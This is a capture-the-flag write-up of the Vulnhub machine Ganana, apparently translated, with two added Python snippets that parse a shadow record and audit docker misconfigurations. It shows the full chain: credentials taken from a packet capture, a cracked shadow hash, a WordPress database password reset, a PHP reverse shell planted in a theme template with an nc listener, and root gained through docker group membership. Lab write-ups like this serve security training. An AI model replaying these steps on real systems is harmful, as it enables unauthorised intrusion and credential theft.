[VLN] Ganana

Today we are going to hack the Vulnhub machine called Ganana. You can download it from the following link: Ganana


Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.142
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-26 16:42 CEST
Nmap scan report for debian.home (192.168.1.142)
Host is up (0.0014s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE  VERSION
22/tcp   closed ssh
80/tcp   open   http     Apache httpd (PHP 7.3.17)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Ganana
443/tcp  open   ssl/http Apache httpd (PHP 7.3.17)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache
|_http-title: Ganana
| ssl-cert: Subject: commonName=www.example.com/organizationName=Bitnami
| Not valid before: 2020-06-06T10:55:45
|_Not valid after:  2030-06-04T10:55:45
6777/tcp open   ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.148
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.04 seconds
Let's explore port 80 a bit more.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.142 -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.142
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/26 16:57:41 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/! (Status: 301)
/0 (Status: 301)
/0000 (Status: 301)
/asdfjkl; (Status: 301)
/atom (Status: 301)
/dashboard (Status: 302)
/embed (Status: 301)
/favicon.ico (Status: 302)
/feed (Status: 301)
/fixed! (Status: 301)
/license (Status: 200)
/logout (Status: 403)
/lostpassword (Status: 200)
/page1 (Status: 301)
/phpmyadmin (Status: 301)
/rdf (Status: 301)
/readme (Status: 200)
/register (Status: 302)
/robots.txt (Status: 200)
/rss (Status: 301)
/rss2 (Status: 301)
/secret (Status: 302)
/tasks (Status: 200)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-config (Status: 200)
/wp-includes (Status: 301)
===============================================================
2020/06/26 17:13:02 Finished
===============================================================
We see several interesting directories. /secret takes us to a WordPress. /phpmyadmin is a phpMyAdmin :) Visiting /tasks at http://192.168.1.142/tasks we find the following text:

Hey Jarret Lee!

Do manage the office as the admin is away for a few weeks! 
Admin has created an other temp account for you and details in a pcapng file. 
After some trying, we finally find the .pcapng file it mentions. It is at: http://192.168.1.142/jarret.pcapng Once downloaded, we open it with Wireshark. If we look at the HTTP packets containing POST /login... we end up finding one where the correct credentials appear.

jarretlee/NoBrUtEfOrCe__R3Qu1R3d__
Once we have the credentials, we log in to the FTP server with them.

sml@Cassandra:~$ ftp 192.168.1.142 6777
Connected to 192.168.1.142.
220 (vsFTPd 3.0.3)
Name (192.168.1.142:sml): jarretlee
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 1000     1000         4096 Jun 25 06:25 .
drwxr-xr-x    3 600      0            4096 Jun 17 07:00 ..
-rw-------    1 1000     1000          177 Jun 17 07:47 .backups
-rw-------    1 1000     1000          515 Jun 25 06:25 .bash_history
-rw-r--r--    1 1000     1000          220 Jun 17 07:00 .bash_logout
-rw-r--r--    1 1000     1000         3526 Jun 17 07:00 .bashrc
drwx------    3 1000     1000         4096 Jun 25 06:25 .gnupg
-rw-r--r--    1 1000     1000          807 Jun 17 07:00 .profile
226 Directory send OK.
ftp> get .backups
local: .backups remote: .backups
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .backups (177 bytes).
226 Transfer complete.
177 bytes received in 0.00 secs (1.5071 MB/s)
We see there is a file called .backups; we download it to see what it is.

sml@Cassandra:~/yeah$ cat .backups 
amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6
We see it is Base64, so we decode it.

sml@Cassandra:~/yeah$ echo "amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6" | base64 -d
jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::
It looks like jeevan's password hash, in the format used in /etc/shadow. We copy the user and the "password" to a file and use john to crack the password.

The file contained a text
sml@Cassandra:~$ echo 'jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1' > paz.txt  # single quotes: inside double quotes the shell would expand $6, $LXNakaBRJ and $bCgiylk as variables
sml@Cassandra:~$ /usr/sbin/john paz.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hannahmontana    (jeevan)
1g 0:00:00:00 DONE (2020-06-26 23:40) 1.492g/s 3820p/s 3820c/s 3820C/s slimshady..hassan
Use the "--show" option to display all of the cracked passwords reliably
Session completed
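As an added example (not part of the original writeup), the following Python decodes the .backups blob and breaks the shadow record into its fields: it maps the `$6$` prefix to the sha512crypt scheme john reported, separates salt from digest, and turns the day counters into dates. Nothing here is cracked; it only shows what the record discloses.

```python
import base64
from datetime import date, timedelta

# The .backups content exactly as downloaded in the writeup (the three wrapped lines joined).
BACKUPS_B64 = (
    "amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9j"
    "RG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6"
    "MDo5OTk5OTo3Ojo6"
)

# crypt(3) scheme identifiers: the token between the first two '$' of the hash field.
CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}

EPOCH = date(1970, 1, 1)


def parse_shadow_line(line):
    """Split one /etc/shadow record (9 colon-separated fields) and decode hash and dates."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError("expected 9 fields, got %d" % len(fields))
    user, pw, lastchange, min_days, max_days, warn, inactive, expire, _ = fields
    rec = {"user": user, "hash": pw}
    parts = pw.split("$")          # "$6$salt$digest" -> ["", "6", "salt", "digest"]
    if pw.startswith("$") and len(parts) >= 4:
        rec["algorithm"] = CRYPT_IDS.get(parts[1], "unknown id " + parts[1])
        rec["salt"] = parts[2]
        rec["digest"] = parts[-1]
    elif pw == "":
        rec["algorithm"] = "empty (no password required)"
    elif pw[0] in "!*":
        rec["algorithm"] = "locked"
    else:
        rec["algorithm"] = "legacy DES crypt"
    # Date fields are days since the Unix epoch; empty means "not set".
    rec["last_change"] = EPOCH + timedelta(days=int(lastchange)) if lastchange else None
    rec["max_days"] = int(max_days) if max_days else None
    rec["expires"] = EPOCH + timedelta(days=int(expire)) if expire else None
    return rec


def decode_backups(b64):
    """Base64-decode the .backups blob and parse the shadow record it contains."""
    return parse_shadow_line(base64.b64decode(b64).decode())
```

The last-change date it recovers (2020-06-17) matches the timestamp of .backups in the FTP listing, which is a useful sanity check that the record really is a copy of the shadow entry.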
We see that user jeevan's password is hannahmontana. We continue in the FTP session. This time we go to the directory /opt/bitnami/apps/wordpress/htdocs and download the file wp-config.php.

ftp> pwd
257 "/opt/bitnami/apps/wordpress/htdocs" is the current directory
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1             405 Feb 06 06:33 index.php
-rw-r--r--    1 1000     1000       189728 Jun 07 08:45 jarret.pcapng
-rw-rw-r--    1 1000     1           19915 Feb 12 11:54 license.txt
-rw-rw-r--    1 1000     1            7278 Jun 16 16:11 readme.html
-rw-r--r--    1 0        0             156 Jun 17 08:15 tasks.txt
-rw-rw-r--    1 1000     1            6912 Feb 06 06:33 wp-activate.php
drwxrwxr-x    9 1000     1            4096 Jun 03 11:23 wp-admin
-rw-rw-r--    1 1000     1             351 Feb 06 06:33 wp-blog-header.php
-rw-rw-r--    1 1000     1            2332 Jun 16 16:11 wp-comments-post.php
-rw-r-----    1 1000     1            4268 Jun 06 10:55 wp-config.php
drwxrwxr-x    9 1000     1            4096 Jun 06 15:08 wp-content
-rw-rw-r--    1 1000     1            3940 Feb 06 06:33 wp-cron.php
drwxrwxr-x   21 1000     1           12288 Jun 03 11:23 wp-includes
-rw-rw-r--    1 1000     1            2496 Feb 06 06:33 wp-links-opml.php
-rw-rw-r--    1 1000     1            3300 Feb 06 06:33 wp-load.php
-rw-rw-r--    1 1000     1           47874 Feb 10 03:50 wp-login.php
-rw-rw-r--    1 1000     1            8509 Apr 14 11:34 wp-mail.php
-rw-rw-r--    1 1000     1           19396 Apr 10 03:59 wp-settings.php
-rw-rw-r--    1 1000     1           31111 Feb 06 06:33 wp-signup.php
-rw-rw-r--    1 1000     1            4755 Feb 06 06:33 wp-trackback.php
-rw-rw-r--    1 1000     1            3133 Feb 06 06:33 xmlrpc.php
226 Directory send OK.
ftp> get wp-config.php
local: wp-config.php remote: wp-config.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for wp-config.php (4268 bytes).
226 Transfer complete.
4268 bytes received in 0.00 secs (5.0815 MB/s)
Let's see whether it has what we are looking for :)

sml@Cassandra:~/yeah$ cat wp-config.php
---SNIP---
/** MySQL database username */
define( 'DB_USER', 'bn_wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', 'aa75e9f9b1' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost:3306' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
---SNIP---
Good, we have credentials! We use them to log in to phpMyAdmin at http://192.168.1.142/phpmyadmin/ In the bitnami_wordpress database we go to the wp_users table and change the password of user charleywalker to jarretlee's, since we know it. Once changed, we log in to WordPress as charleywalker with the password we set... that is, the same password jarretlee uses. We prepare a reverse shell.

sml@Cassandra:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
sml@Cassandra:~$ mv php-reverse-shell.php rshell.php
sml@Cassandra:~$ nano rshell.php # Edit it with our IP/port.
In WordPress, logged in as charleywalker, we go to Appearance --> Theme Editor -> 404 Template (404.php). We edit it, paste the reverse shell and save. We start nc listening:

sml@Cassandra:~$ nc -nlvp 1234
listening on [any] 1234 ...
And we visit http://192.168.1.142/404.php

Low Shell



sml@Cassandra:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.142] 57130
Linux debian 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 19:57:55 up  2:04,  0 users,  load average: 0.44, 0.16, 0.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Since in the previous steps we found user jeevan's password, we use su to switch to that user.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
daemon@debian:/home$
daemon@debian:/home/jarretlee$ su jeevan
Password: hannahmontana
jeevan@debian:/home/jarretlee$ id
uid=1003(jeevan) gid=1005(jeevan) groups=1005(jeevan),115(docker)
We see that jeevan is in the docker group, so let's see which images there are.

jeevan@debian:/tmp$ docker images
docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
bash                latest              0980cb958276        3 weeks ago         13.1MB
alpine              latest              a24bb4013296        3 weeks ago         5.57MB
hello-world         latest              bf756fb1ae65        5 months ago        13.3kB
We have a bash image that may be useful :) We mount the host's / at /mnt/mygod inside the container we are going to run; since we are root inside the container, we can read the whole root filesystem of the host that we mounted at /mnt/mygod...
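From the defender's side, the finding in the last two steps is a misconfiguration that can be audited: a non-root account in the docker group, and a running container with the host root bind-mounted. The Python below is an added example (not the writeup's or Docker's own code) that checks both over constructed samples of /etc/group and an abbreviated `docker inspect` document; the container name "escape" and the sample contents are assumptions.

```python
import json

# Constructed sample of /etc/group, modelled on the membership seen in the writeup
# (jeevan is gid 1005 and a supplementary member of docker, gid 115).
SAMPLE_GROUP = """root:x:0:
daemon:x:1:
docker:x:115:jeevan
jeevan:x:1005:
"""

# Constructed, heavily abbreviated `docker inspect` output: one container with the
# host root bind-mounted (as in the writeup) and one using an ordinary named volume.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/escape", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt/mygod", "RW": True}]},
    {"Name": "/web", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data",
                 "Destination": "/data", "RW": True}]},
])

# Host paths that hand a container effective root over the host when bind-mounted.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/run/docker.sock")


def docker_group_members(group_text):
    """Return the non-root accounts listed as supplementary members of 'docker'.

    The docker daemon runs as root and mounts any host path a client asks for, so
    membership of this group is equivalent to root on the host.
    """
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u and u != "root"]
    return []


def _is_sensitive(host_path):
    if host_path in SENSITIVE_HOST_PATHS:
        return True
    return any(host_path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")


def risky_containers(inspect_json):
    """Return (container, host path, mount point) for every bind mount of a sensitive
    host path; privileged containers are reported with 'privileged' as the host path."""
    findings = []
    for c in json.loads(inspect_json):
        name = c.get("Name", "").lstrip("/")
        if c.get("HostConfig", {}).get("Privileged"):
            findings.append((name, "privileged", ""))
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and _is_sensitive(m.get("Source", "")):
                findings.append((name, m["Source"], m.get("Destination", "")))
    return findings
```

On a live host, feed `docker_group_members` the contents of /etc/group and `risky_containers` the output of `docker inspect $(docker ps -aq)`.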

root.txt



jeevan@debian:/tmp$ docker run -v /:/mnt/mygod -ti 0980cb958276
docker run -v /:/mnt/mygod -ti 0980cb958276
bash-5.0# cd /mnt/mygod/root
bash-5.0# ls
bitnami              jeevan
bitnami_credentials  root.txt
bash-5.0# cat root.txt

                    _       _                 _                              _  
 __ __ __  ___     | |     | |      o O O  __| |    ___    _ _      ___     | | 
 \ V  V / / -_)    | |     | |     o      / _` |   / _ \  | ' \    / -_)    |_| 
  \_/\_/  \___|   _|_|_   _|_|_   TS__[O] \__,_|   \___/  |_||_|   \___|   _(_)_  
_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 

End


And with that we are root on the machine :)